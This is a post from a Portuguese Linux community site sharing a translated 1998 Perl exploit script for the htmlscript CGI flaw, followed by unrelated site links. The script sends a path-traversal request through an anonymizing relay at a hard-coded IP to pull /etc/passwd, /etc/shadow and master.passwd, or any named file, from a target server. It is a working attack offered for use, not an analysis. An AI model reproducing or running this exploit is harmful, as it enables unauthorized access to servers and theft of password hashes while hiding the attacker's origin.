Testando servers a HTMLSCRIPT
Publicado por Douglas Vigliazzi 13/12/2002
[ Hits: 4.453 ]
Este script testa servidores à vulnerabilidade de HTMLSCRIPT, o qual permite a obtenção de qualquer arquivo, inclusive o passwd e shadow.
Esta falha compromete bastante a segurança.
#!/usr/bin/perl -w # $Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $ # # Obtém /etc/{passwd,shadow,master.passwd} ou qualquer arquivo de servers # vulneraveis à htmlscript. A requisição HTTP será feita através de um # roteador anonimo. # # Copyright (c) 1998 by zap <zap@arosnet.se> # Tradução Douglas Vigliazzi e adaptação # $Log: htmlscript.pl,v $ # Initial revision # use strict; use Socket; my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr, $proto, $line); $verbose = 1; $onion_router = "132.250.80.12"; $onion_port = 9200; $onion_timeout = 10; $iaddr = inet_aton($onion_router); $paddr = sockaddr_in($onion_port, $iaddr); $proto = getprotobyname("tcp"); my ($victim, $file) = @ARGV or die "Usar: httpscript.pl <host> [<arquivo>]\n"; sub get_file { $SIG{"ALRM"} = sub { close(ONION); }; alarm $onion_timeout; socket(ONION, AF_INET, SOCK_STREAM, $proto); select(ONION); $| = 1; select(STDOUT); if (connect(ONION, $paddr)) { $SIG{"ALRM"} = "IGNORAR"; print "[ $victim:$file ]\n" if $verbose; print ONION "GET http://$victim/cgi-bin/htmlscript?../../../", "../../../../..$file\n\n"; while (defined($line = <ONION>)) { print $line } } else { die "Erro: Conexão para roteador $onion_router esgotada ", " ($onion_timeout\s).\n"; } close(ONION); } if ($file) { get_file; } else { $file = "/etc/passwd"; get_file; $file = "/etc/shadow"; get_file; $file = "/etc/master.passwd"; get_file; }
Criando sua própria criptografia em hash
Zend Framework application.ini vulnerability exploit
Nenhum comentário foi encontrado.
Agora temos uma assistente virtual no fórum!!! (247)
Manutenção de sistemas Linux Debian e derivados com apt-get, apt, aptitude e dpkg
Melhorando o tempo de boot do Fedora e outras distribuições
Como instalar as extensões Dash To Dock e Hide Top Bar no Gnome 45/46
Como Atualizar Fedora 39 para 40
Instalar Google Chrome no Debian e derivados
Consertando o erro do Sushi e Wayland no Opensuse Leap 15
Instalar a última versão do PostgreSQL no Lunix mantendo atualizado
Flathub na sua distribuição Linux e comandos básicos de gerenciamento
Reset do linux sem perder dual boot (0)
Lançado Ubuntu 24.04 Final (6)
redirecionando saida de comando touch para o AWK[AJUDA] (2)